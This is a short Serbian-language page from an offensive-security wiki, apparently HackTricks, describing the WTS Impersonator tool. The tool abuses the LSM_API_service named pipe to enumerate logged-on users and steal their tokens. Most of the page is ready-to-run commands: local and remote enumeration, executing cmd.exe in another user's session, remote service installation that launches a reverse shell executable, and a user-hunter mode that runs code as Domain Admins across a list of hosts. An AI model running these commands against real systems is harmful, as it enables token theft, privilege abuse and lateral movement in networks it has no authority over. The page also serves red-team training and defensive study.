2.1 KiB
{{#include ../../banners/hacktricks-training.md}}
Alat WTS Impersonator koristi "\pipe\LSM_API_service" RPC Named pipe da tiho enumeriše prijavljene korisnike i preuzme njihove tokene, zaobilazeći tradicionalne tehnike Token Impersonation. Ovaj pristup olakšava neometano lateralno kretanje unutar mreža. Inovacija iza ove tehnike pripisuje se Omri Baso, čiji je rad dostupan na GitHub.
Osnovna Funkcionalnost
Alat funkcioniše kroz niz API poziva:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Ključni Moduli i Korišćenje
-
Enumeracija Korisnika: Lokalna i daljinska enumeracija korisnika je moguća sa alatom, koristeći komande za svaku situaciju:
-
Lokalno:
.\WTSImpersonator.exe -m enum
- Daljinski, specificiranjem IP adrese ili imena hosta:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
-
Izvršavanje Komandi: Moduli
exec
iexec-remote
zahtevaju Servis kontekst da bi funkcionisali. Lokalno izvršavanje jednostavno zahteva WTSImpersonator izvršni fajl i komandu: -
Primer za lokalno izvršavanje komande:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe se može koristiti za dobijanje servisnog konteksta:
.\PsExec64.exe -accepteula -s cmd.exe
-
Daljinsko Izvršavanje Komandi: Uključuje kreiranje i instaliranje servisa daljinski slično PsExec.exe, omogućavajući izvršavanje sa odgovarajućim dozvolama.
-
Primer daljinskog izvršavanja:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Modul za Lov na Korisnike: Cilja specifične korisnike na više mašina, izvršavajući kod pod njihovim akreditivima. Ovo je posebno korisno za ciljanje Domain Admins sa lokalnim administratorskim pravima na nekoliko sistema.
- Primer korišćenja:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
{{#include ../../banners/hacktricks-training.md}}